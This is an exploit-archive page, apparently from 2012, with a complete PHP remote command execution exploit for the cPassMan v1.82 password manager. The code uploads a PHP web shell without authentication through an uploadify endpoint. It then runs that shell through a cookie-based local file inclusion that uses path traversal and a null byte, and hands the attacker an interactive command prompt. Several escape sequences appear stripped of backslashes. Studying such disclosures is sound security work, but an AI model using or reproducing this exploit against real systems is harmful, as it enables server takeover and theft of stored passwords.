cPassMan v1.82 Remote Command Execution Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : cPassMan v1.82 Remote Command Execution Exploit
# Published : 2012-02-25
# Author :
# Previous Title : Dlink DCS series CSRF Change Admin Password
# Next Title : Limesurvey (PHPSurveyor v.1.91+ stable) Blind SQL Injection

Product.                       Collaborative Passwords Manager (cPassMan)
Platform.                      Independent (PHP)
Affected versions.             1.82

<?php
/*
 * cPassMan v1.82 Remote Command Execution Exploit by ls (contact@kaankivilcim.com)
 * Disclaimer: cPassMan developer was notified of vulnerabilities in April 2011 and advised that v1.x was no longer supported.
 * Note: Requires PHP 5.3.3 or lower due to the use of a poison null byte in the LFI.
 */

if ($argc < 3) {
  print "Usage: php -f {$argv[0]} <host> <path> (e.g. php -f {$argv[0]} 192.168.129.130 /cpassman)n";
  exit();
}

print "--------------------------------------------------------------------------------n";
print "cPassMan v1.82 Remote Command Execution Exploit by ls (contact@kaankivilcim.com)n";
print "--------------------------------------------------------------------------------n";

$host = $argv[1];
$path = $argv[2];

$port = 80;

/*
 * Stage One: Unauthenticated Arbitrary File Upload
 * Uploaded files are stored in the document root of the web server as a file with the MD5 hash of the original filename.
 */

print "[*] Stage One: Uploading command execution handler... ";

$upload_path = $path . "/includes/libraries/uploadify/uploadify.php";
$fp = fsockopen($host, $port, $errno, $errstr, 30);

if ($fp) {
  fputs($fp, "POST $upload_path HTTP/1.1rn");
  fputs($fp, "Host: $hostrn");
  fputs($fp, "Content-Type: multipart/form-data; boundary=---------------------------4827543632391rn");
  fputs($fp, "Content-Length: 233rnrn");
  fputs($fp, "-----------------------------4827543632391rn");
  fputs($fp, "Content-Disposition: form-data; name="Filedata"; filename="rabbit.txt";rn");
  fputs($fp, "Content-Type: text/plainrnrn");
  fputs($fp, "<?php echo system($_GET['z']); die(); ?>rn");
  fputs($fp, "-----------------------------4827543632391--rnrn");

  $result = fgets($fp, 16);
  fclose($fp);
}

if (strstr($result, "200 OK")) {
  print "Success!n";
}

/*
 * Stage Two: Local File Inclusion
 * Several LFI vulnerabilities exist in the user language selection functionality. The exploit uses the user_language cookie attack vector.
 */

print "[*] Stage Two: Confirming command execution via local file inclusion... ";

$cmd = "echo rabbit";
$success = FALSE;

$stdin = fopen("php://stdin","r");

do {
  $cmd = str_replace(" ", "+", $cmd);
  $lfi_path = $path . "/index.php?z=" . $cmd;

  $fp = fsockopen($host, $port, $errno, $errstr, 30);
  
  if ($fp) {
    fputs($fp, "GET $lfi_path HTTP/1.1rn");
    fputs($fp, "Host: 192.168.129.130rn");
    fputs($fp, "Cookie: user_language=../../../89f84a8775dd8f60cdbdef0d73919511%00rn");
    fputs($fp, "Content-Length: 0rnrn");
  
    for ($i = 0; $i < 13; $i++) {
      fgets($fp, 2048);
    }
  
    $output = "n";

    while (($tmp = fgets($fp, 2048)) != FALSE && !feof($fp)) {
      $output .= $tmp;
    }

    if ($success) {
      echo $output;
    }
  
    fclose($fp);
  }

  if (!$success && strstr($output, "rabbit")) {
    $success = TRUE;
    print "Success!n";
  }

  print "n> ";
} while ($cmd = trim(fgets($stdin)));
?>